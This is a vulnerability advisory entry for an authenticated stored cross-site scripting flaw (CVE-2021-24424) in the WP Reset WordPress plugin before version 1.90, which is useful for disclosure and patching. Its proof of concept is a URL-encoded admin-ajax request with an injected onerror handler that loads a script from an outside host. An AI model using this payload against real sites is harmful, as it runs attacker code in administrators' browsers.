WP Reset < 1.90 – Authenticated Stored XSS | CVE 2021-24424 | Plugin Vulnerabilities

Description

The plugin did not sanitise or escape its extra_data parameter when creating a snapshot via the admin dashboard, leading to an authenticated Stored Cross-Site Scripting issue

Proof of Concept

PoC | Authenticated Persistent XSS | Enter snapshot name or brief description:

https://example.com/wp-admin/admin-ajax.php?action=wp_reset_run_tool&_ajax_nonce=394f497fd0&tool=create_snapshot&extra_data=%3Cimg%20src%3Dx%20onerror%3D%3Bimport(%60%2F%2Fm0ze.ru%2Fpayload%2Fa.js%60)%3B%20%2F%2F%3E

Affects Plugins

Fixed in 1.90

References

CVE

URL

https://m0ze.ru/vulnerability/[2021-05-26]-[WordPress]-[CWE-79]-WP-Reset-WordPress-Plugin-v1.86.txt

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

m0ze

Submitter

m0ze

Submitter website

https://m0ze.ru

Submitter twitter

Verified

Yes

WPVDB ID

90cf8f9d-4d37-405d-b161-239bdb281828

Timeline

Publicly Published

2021-06-16 (about 4 years ago)

Added

2021-06-16 (about 4 years ago)

Last Updated

2022-03-05 (about 3 years ago)

Other

Published

Title

Published

2014-11-04

Title

Ninja Forms 2.8.6 - Reflected Cross-Site Scripting (XSS)

Published

2025-03-11

Title

Post Read Time <= 1.2.6 - Authenticated (Administrator+) Stored Cross-Site Scripting

Published

2025-11-07

Title

WP2Social Auto Publish < 2.4.8 - Reflected Cross-Site Scripting via PostMessage

Published

2021-12-27

Title

Registration Magic < 5.0.1.9 - Reflected Cross-Site Scripting

Published

2024-10-24

Title

Import and export users and customers < 1.27.6 - Authenticated (Administrator+) Stored Cross-Site Scripting